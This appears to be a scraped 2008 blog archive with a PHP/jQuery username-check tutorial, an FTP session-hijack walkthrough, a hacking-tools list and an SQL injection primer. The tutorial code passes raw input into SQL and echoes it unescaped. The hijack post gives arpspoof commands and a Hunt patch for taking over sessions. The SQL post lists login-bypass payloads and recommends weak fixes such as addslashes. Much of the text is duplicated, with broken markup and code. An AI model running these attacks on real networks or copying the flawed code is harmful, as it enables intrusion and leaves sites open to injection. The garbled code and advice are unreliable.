Archive for Desember 2008
This post about Twitter used jQuery plug-in JavaScript code in registration page username Availability check and update Screen name.
This is very useful stuff, this is the best way to implement it and the only thing you have to modify just some database connection parameters.
jQuery Plug-in :Download
Step1: Modifiy dbconnection.php
Change MySQL connection parameters in dbconnection.php
<?php
$mysql_hostname = "Host name";
$mysql_user = "UserName";
$mysql_password = "Password";
$mysql_database = "Database Name";
$prefix = "";
$bd = mysql_connect($mysql_hostname, $mysql_user, $mysql_password) or die("Could not connect database");
mysql_select_db($mysql_database, $bd) or die("Could not select database");
?>
$mysql_hostname = "Host name";
$mysql_user = "UserName";
$mysql_password = "Password";
$mysql_database = "Database Name";
$prefix = "";
$bd = mysql_connect($mysql_hostname, $mysql_user, $mysql_password) or die("Could not connect database");
mysql_select_db($mysql_database, $bd) or die("Could not select database");
?>
Step2: cofigure check.php
Change table name and column name in SQL query.
<?php
// This is a code to check the username from a mysql database table
if(isSet($_POST['username']))
{
$username = $_POST['username'];
include("dbconnection.php");
$sql_check = mysql_query("SELECT user FROM {$prefix}users WHERE user='$username'");
if(mysql_num_rows($sql_check))
{
echo '<span style="color: red;">The username <b>'.$username.'</b> is already in use.</span>';
}
else
{
echo 'OK';
}}
?>
Step 3. Add JQuery framework on your page
jQuery Plug-in :Download
First, you have to download the jQuery plugin and add a link to the framework within the tag <head> of the page:
Step 4. Registration.php Code
HTML code for this example is very simple:
<script src="js/jquery.js" type="text/javascript">/script>
<script type="text/javascript">
pic1 = new Image(16, 16);
pic1.src = "loader.gif";
$(document).ready(function(){
$("#username").change(function() {
var usr = $("#username").val();
if(usr.length >= 3)
{
$("#status").html('<img align="absmiddle" src="loader.gif" /> Checking availability...');
$.ajax({
type: "POST",
url: "check.php",
data: "username="+ usr,
success: function(msg){
$("#status").ajaxComplete(function(event, request, settings){
if(msg == 'OK')
{
$("#username").removeClass('object_error'); // if necessary
$("#username").addClass("object_ok");
$(this).html(' <img align="absmiddle" src="accepted.png" /> ');
}
else
{
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
$(this).html(msg);
}});}});}
else
{
$("#status").html('The username should have at least 3 characters.');
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
}});});
//-->
</script>
<div>
<label>User name:</label>
<input type="text" id="username" name="username" class="inn"/>
</div>
<div id="status"></div>
<script type="text/javascript">
pic1 = new Image(16, 16);
pic1.src = "loader.gif";
$(document).ready(function(){
$("#username").change(function() {
var usr = $("#username").val();
if(usr.length >= 3)
{
$("#status").html('<img align="absmiddle" src="loader.gif" /> Checking availability...');
$.ajax({
type: "POST",
url: "check.php",
data: "username="+ usr,
success: function(msg){
$("#status").ajaxComplete(function(event, request, settings){
if(msg == 'OK')
{
$("#username").removeClass('object_error'); // if necessary
$("#username").addClass("object_ok");
$(this).html(' <img align="absmiddle" src="accepted.png" /> ');
}
else
{
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
$(this).html(msg);
}});}});}
else
{
$("#status").html('The username should have at least 3 characters.');
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
}});});
//-->
</script>
<div>
<label>User name:</label>
<input type="text" id="username" name="username" class="inn"/>
</div>
<div id="status"></div>
Download source code
Update Screen Name
settings.js : enables jQuery functionalities
javascript code enables the jQuery functionalities.
var twitter=function()
{
var rtn={updateUrl:function(value){$("#username_url").html(value)},
screenNameKeyUp:function(){
jQuery("#user_screen_name").keyup(function(event){var screen_name=jQuery("#user_screen_name");
}
)
},return rtn}();
{
var rtn={updateUrl:function(value){$("#username_url").html(value)},
screenNameKeyUp:function(){
jQuery("#user_screen_name").keyup(function(event){var screen_name=jQuery("#user_screen_name");
}
)
},return rtn}();
Copy jquery.js and settings.js in js folder
Registration.php Final code
<html>
<head>
<script src="js/jquery.js" type="text/javascript">/script>
<script src="js/settings.js" type="text/javascript"></script>
<script type="text/javascript">
pic1 = new Image(16, 16);
pic1.src = "loader.gif";
$(document).ready(function(){
$("#username").change(function() {
var usr = $("#username").val();
if(usr.length >= 3)
{
$("#status").html('<img align="absmiddle" src="loader.gif" /> Checking availability...');
$.ajax({
type: "POST",
url: "check.php",
data: "username="+ usr,
success: function(msg){
$("#status").ajaxComplete(function(event, request, settings){
if(msg == 'OK')
{
$("#username").removeClass('object_error'); // if necessary
$("#username").addClass("object_ok");
$(this).html(' <img align="absmiddle" src="accepted.png" /> ');
}
else
{
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
$(this).html(msg);
}});}});}
else
{
$("#status").html('The username should have at least 3 characters.');
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
}});});
//-->
</script>
</head>
<body>
<div>
<label>User name:</label>
<input type="text" id="username" name="username" onkeyup="Twitter.updateUrl(this.value)" class="inn"/>
http://xyz.com/<span id="username_url" class="url">USERNAME</span>
</div>
<div id="status"></div>
<script type="text/javascript">
$( function () {
twitter.screenNameKeyUp();
$('#user_screen_name').focus();
});
</html>
<head>
<script src="js/jquery.js" type="text/javascript">/script>
<script src="js/settings.js" type="text/javascript"></script>
<script type="text/javascript">
pic1 = new Image(16, 16);
pic1.src = "loader.gif";
$(document).ready(function(){
$("#username").change(function() {
var usr = $("#username").val();
if(usr.length >= 3)
{
$("#status").html('<img align="absmiddle" src="loader.gif" /> Checking availability...');
$.ajax({
type: "POST",
url: "check.php",
data: "username="+ usr,
success: function(msg){
$("#status").ajaxComplete(function(event, request, settings){
if(msg == 'OK')
{
$("#username").removeClass('object_error'); // if necessary
$("#username").addClass("object_ok");
$(this).html(' <img align="absmiddle" src="accepted.png" /> ');
}
else
{
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
$(this).html(msg);
}});}});}
else
{
$("#status").html('The username should have at least 3 characters.');
$("#username").removeClass('object_ok'); // if necessary
$("#username").addClass("object_error");
}});});
//-->
</script>
</head>
<body>
<div>
<label>User name:</label>
<input type="text" id="username" name="username" onkeyup="Twitter.updateUrl(this.value)" class="inn"/>
http://xyz.com/<span id="username_url" class="url">USERNAME</span>
</div>
<div id="status"></div>
<script type="text/javascript">
$( function () {
twitter.screenNameKeyUp();
$('#user_screen_name').focus();
});
</script>
</body></html>
Download source code
Visual Database Desing with MySQL Workbench
Rating: 4.5
Reviewer: Unknown
ItemReviewed: jQuery Username Availability check.
Transmission Control Protocol (TCP) Hijack
Sabtu, 20 Desember 2008
Posted by Unknown
Tag :
C prorgramming,
Hacking
This guide is meant for ethical hacking or audit with authorization purposes only. The author is not responsible for any consequences otherwise. The material is copyrighted.
Requirements: Linux OS, Connect to the same LAN or wireless network as the victim,
Once a malicious user gains access to the FTP session traffic he can now begin to monitor the session and wait for an opportunity to hijack the session. A hijack occurs when the attacker is able to intercept the communication between the client and server after the session has been authenticated. The simplest method to hijack the session would be to send a reset to the user forcing the client application to close the FTP session but he also have to prevent the client from resetting the port on the server end. If he does not prevent this packet from reaching the server then the connection will be terminated and he will have to wait for another opportunity to hijack a session. Once he has successfully closed the client, he now has the opportunity to send queries to the server requesting files or upload his own malicious files to the server. Since he was monitoring the entire session between the server and client he has the right sequence number and acknowledgment number so that the server thinks its still communicating with the original client.
If the attacker chooses to keep both the client and server running then he will have to keep track of the sequence number and acknowledgment number being sent between the client and server. Any command that the attacker sends to the server will change the sequence number and acknowledgment numbers and will cause the client and server to be out of synchronization and they will not be able to communicate thus causing the connection to close. This method is more difficult because the attacker now has to continually change the client and server sequence/acknowledgment numbers to reflect the commands that he injected towards the server and the data he received from the server.
You have to be on the same wireless or LAN network to accomplish this.
The process of FTP Hijack:
ARP Spoof
Arp spoof the victim to the gateway (Victim: 192.168.2.2; Gateway: 192.168.2.1) using arpspoof from the attacking machine (192.168.2.160) to redirect all traffic through the attacker.
CODE :
# echo 1 >; /proc/sys/net/ipv4/ip_forward
# arpspoof -t 192.168.2.1 192.168.2.2
# arpspoof -t 192.168.2.2 192.168.2.1
# arpspoof -t 192.168.2.1 192.168.2.2
# arpspoof -t 192.168.2.2 192.168.2.1
HUNT
Hunt is a program for intruding into a connection, watching it and resetting it. Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segments or hosts that are on switched ports. Hunt doesn't distinguish between local network connections and connections going to/from Internet. It can handle all connections it sees. Connection hijacking is aimed primarily at the telnet or rlogin traffic but it can be used for another traffic too. Features: connection management (watching, spoofing, detecting, hijacking, resetting), daemons (resetting, arp spoof/relayer daemon, MAC discovery daemon for collecting MAC addresses, sniff daemon for logging TCP traffic), host resolving, packet engine (TCP, UDP, ICMP and ARP traffic; collecting TCP connections with sequence numbers and the ACK storm detection), switched environment (hosts on switched ports can be spoofed, sniffed and hijacked too). This latest release includes lots of debugging and fixes in order to get the hunt running against hosts on switched ports, timejobs, dropping IP fragments, verbose status bar, options, new connection indicator, various fixes.
By default, Hunt only monitors telnet (port 23) and rlogin (port 513) sessions, but the code is written in such a way that it would be very easy to add other types. In the file hunt.c, in the initialization code for the entry function, is this line:
CODE :
add_telnet_rlogin_policy();
This function is located in the addpolicy.c file and here's the function in question:
CODE :
api->;dst_ports[2] = htons(21); was added to incorporate FTP sessions.
void add_telnet_rlogin_policy(void)
{
struct add_policy_info *api;
api = malloc(sizeof(struct add_policy_info));
assert(api);
memset(api, 0, sizeof(sizeof(struct add_policy_info)));
api->;src_addr = 0;
api->;src_mask = 0;
api->;dst_addr = 0;
api->;dst_mask = 0;
api->;src_ports[0] = 0;
api->;dst_ports[0] = htons(23);
api->;dst_ports[1] = htons(513);
api->;dst_ports[2] = htons(21); //This port was added for FTP
api->;dst_ports[3] = 0;
list_push(&;l_add_policy, api);
};
void add_telnet_rlogin_policy(void)
{
struct add_policy_info *api;
api = malloc(sizeof(struct add_policy_info));
assert(api);
memset(api, 0, sizeof(sizeof(struct add_policy_info)));
api->;src_addr = 0;
api->;src_mask = 0;
api->;dst_addr = 0;
api->;dst_mask = 0;
api->;src_ports[0] = 0;
api->;dst_ports[0] = htons(23);
api->;dst_ports[1] = htons(513);
api->;dst_ports[2] = htons(21); //This port was added for FTP
api->;dst_ports[3] = 0;
list_push(&;l_add_policy, api);
};
The source files were compiled and hunt.c executed.
CODE :
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
--
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
--
HUNT Preparations
Customize Options and Start Daemons
o is typed to customize options. The MAC base is changed to attacker's NIC 00:ab:cd:ef:gh:mn. Host resolving, arp spoof with MAC base and learn IP from MAC discovery are all enabled.
From the main menu, d daemons -- a arp spoof daemon is started. Hunt can also arp spoof the hosts and targets if specified.
FTP Hijack
From the main menu, l gives a list of connections.
0) 192.168.2.2 [32777] -- 95.623.58.102 [21]
w - Watches the above connection.
a - Performs a simple hijack.
Once you hijack, you have access to the files being sent. You can manipulate them using a tool like frag route to craft evil packets. If the connection is telnet on port 23, you will have the shell on both the machines.
Impact
? Access to Data
? Access to the command shell
? DOS Attack
Most Popular Articles:-Most Popular Articles Links
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Transmission Control Protocol (TCP) Hijack
Great Free Hacking Softwares? take a look at this list with some of my favourite hacking tools which you can download and use it carefully.
1. Nmap Security Scanner
Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts areRead more...
2. Tor:anonymity online
Tor is a software project that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. Read more...
3. Net
Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.Read more...
4. sol Editer
A flash hacking alternative to variable editing and cheat engine, you can change values saved by the game in a “.sol” file. You will find the .SOL files in x:\Documents and Settings\[account-name]\Application Data\Macromedia\Flash Player\#SharedObjects\ followed by the name of the website. If the game was running from your computer, the .SOL will be in the “localhost” folder. Replace ‘x’ with your main drive, the one with your OS, and the account-name with the currently logged in user.Download...
5. Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any softwareRead more...
6. Wireshark
Network protocol analyzer for Windows and Unix that allows examination of data from a live network, or from a capture file on diskRead more...
7. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3300 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).Read more...
8. DollarDNS Whois
DollarDNS Whois Direct allows users to make advanced WHOIS queries against a domain, including raw queries Read more...
9. Firebug
Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, JavaScript, and network activity live in any web page.Download...
10. Tamper Data
Use tamperdata to view and modify HTTP/HTTPS headers and post parameters... Download...
11. Add N Edit Cookies
Cookie Editor that allows you add and edit "session" and saved... Download..
Note : Most of the Anti-virus detect as a Trojans or Malwares.
Previous Topic :Hack your Own Web Project ? SQL Injection
Related Post
'Onion Routing' Anonymous NetworkMake Windows Genuine
Hacking Algorithm
Rating: 4.5
Reviewer: Unknown
ItemReviewed: 10 Free Hacking Tools
Are you looking for some useful tips to improve your web projects security? In this post I suggest you some interesting points about this topic.
Hacking is very interesting topic you can improve programming skill.
SQL Injection
SQL Injection like this
Login Java Code
String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");
query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if(users.next()){
//some thing here
}
else{
}
Injection Works like thisString password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");
query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if(users.next()){
//some thing here
}
else{
}
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";
Login PHP Code;
Username = ' OR 1=1;//
Password = ....
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];
$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
//some code
}
else {
}
Injection Works like this$mypassword=$_POST['pwd'];
$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
//some code
}
else {
}
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";
How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php
//Java Code
addSlashes(String userid);
// PHP Code
$myusername=addslashes($_POST['usr'];);
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp).addSlashes(String userid);
// PHP Code
$myusername=addslashes($_POST['usr'];);
http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory.
My Best Hacking Training Site Hackthissite.org
Hacker's Game full control with Unix based commands. Play and learn many more hacking things
http://9lessons.blogspot.com/2008/12/prepared-statements.html
Next Topic :Prepared Statements
Related Post
'Onion Routing' Anonymous NetworkMake Windows Genuine
Hacking Algorithm
10 Free Hacking Softwares
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Hack your Own Web Project ? SQL Injection